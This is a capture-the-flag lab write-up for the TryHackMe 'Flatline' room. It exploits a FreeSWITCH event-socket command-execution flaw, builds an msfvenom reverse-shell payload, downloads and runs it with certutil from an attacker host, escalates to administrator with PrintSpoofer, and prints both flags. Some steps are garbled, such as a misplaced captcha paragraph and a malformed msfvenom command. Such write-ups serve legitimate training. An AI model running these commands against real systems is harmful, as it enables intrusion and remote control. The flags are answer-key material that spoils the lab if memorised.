How low are your morals?
| Title | Flatline |
|---|
| Description | How low are your morals? |
| Points | 60 |
| Difficulty | Easy |
| Maker | Nekrotic |
Summary
Flatline: in this machine we exploit FreeSwitch service running on the machine, it allows RCE, from there we get out shell and escalate our privilidges using the classi PrintSpoofer, there are also other ways to escalate like just granting yourself the permesstion to read the root.txt flag.
Enumeration
After trying a random user and password from the list we got, the error says : Invalid username, and after certain number of attemps we start getting capcha’s to solve, we automate the process using python :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| └─$ nmap -p$ports -sC -sV -Pn -n 10.10.162.76
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 10:17 UTC
Nmap scan report for 10.10.162.76
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2025-07-03T10:09:04
|_Not valid after: 2026-01-02T10:09:04
|_ssl-date: 2025-07-04T10:18:07+00:00; -2s from scanner time.
| rdp-ntlm-info:
| Target_Name: WIN-EOM4PK0578N
| NetBIOS_Domain_Name: WIN-EOM4PK0578N
| NetBIOS_Computer_Name: WIN-EOM4PK0578N
| DNS_Domain_Name: WIN-EOM4PK0578N
| DNS_Computer_Name: WIN-EOM4PK0578N
| Product_Version: 10.0.17763
|_ System_Time: 2025-07-04T10:18:03+00:00
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
|
since we don’t have credentials we can’t use the 3389 port, let’s focus on port 8021, and see if it’s vulnerable to a cve :
1
2
3
4
5
6
7
8
9
| ┌──(azadin㉿kali)-[~/tryhackme]
└─$ searchsploit freeswitch
--------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit) | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution | windows/remote/47799.txt
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
|
Shell
we’ll be using the second one.
1
2
3
4
5
| ┌──(azadin㉿kali)-[~/tryhackme]
└─$ python3 47799.txt 10.10.162.76 'whoami'
Authenticated
Content-Type: api/response
Content-Length: 94
|
we probably can root this machine just from executing commands from here, since our user is in the administrators group, and to use the first port, we just need to reset our password ( this is an easy way to do things )
but this wasn’t stable in my case so I went a step ahead and used a reverse shell :
1
| python3 47799.txt msfvenom -p windows/shell_reverse_tcp LHOST=10.11.38.124 LPORT=4444 -f exe -o shell.exe
|
you first create one and next you deliver it to the machine, start a simple python server on the same directory you have shell.exe on and :
1
2
3
4
5
6
7
8
9
10
11
12
13
| ┌──(azadin㉿kali)-[~/tryhackme]
└─$ python3 47799.txt 10.10.162.76 'certutil -urlcache -split -f http://10.9.2.77:8000/shell.exe'
Authenticated
Content-Type: api/response
Content-Length: 94
┌──(azadin㉿kali)-[~/tryhacke]
└─$ python3 47799.txt 10.10.162.76 'shell.exe'
Authenticated
Content-Type: api/response
Content-Length: 14
|
on another terminal you should start the listener on port 4444 or any port your chose before.
User Flag :
1
2
3
| C:\Users\Nekrotic\Desktop>more user.txt
more user.txt
THM{64bca0843d535fa73eecdc59d27cbe26}
|
next it would be easy to just reset the passsword for Nekrotic using net … and then connect using the first port through rdp if you like gui more. my case let’s just see what else can be done.
Root Flag
the root.txt is in the same directory as user.txt but we don’t have permession to read it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| C:\Users\Administrator>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Disabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
|
SeImpersonatePrivilege : this one is a classic whenever you see it, think of printspoofer, a golden ticket to administrator account, so I already have the binary, delivered it to the machine same as we did with our reverse shell before, and next be a root:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
| C:\Users\Nekrotic\Desktop>certutil -urlcache -split -f http://10.9.2.77:8000/PrintSpoofer.exe
certutil -urlcache -split -f http://10.9.2.77:8000/PrintSpoofer.exe
**** Online ****
0000 ...
6a00
CertUtil: -URLCache command completed successfully.
C:\Users\Nekrotic\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 84FD-2CC9
Directory of C:\Users\Nekrotic\Desktop
04/07/2025 11:59 <DIR> .
04/07/2025 11:59 <DIR> ..
04/07/2025 11:59 27,136 PrintSpoofer.exe
09/11/2021 08:39 38 root.txt
09/11/2021 08:39 38 user.txt
3 File(s) 27,212 bytes
2 Dir(s) 50,056,843,264 bytes free
C:\Users\Nekrotic\Desktop>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Nekrotic\Desktop>dir
Directory of C:\Users\Nekrotic\Desktop
04/07/2025 11:59 <DIR> .
04/07/2025 11:59 <DIR> ..
04/07/2025 11:59 27,136 PrintSpoofer.exe
09/11/2021 08:39 38 root.txt
09/11/2021 08:39 38 user.txt
3 File(s) 27,212 bytes
2 Dir(s) 50,057,846,784 bytes free
C:\Users\Nekrotic\Desktop>more root.txt
more root.txt
THM{8c8bc5558f0f3f8060d00ca231a9fb5e}
|
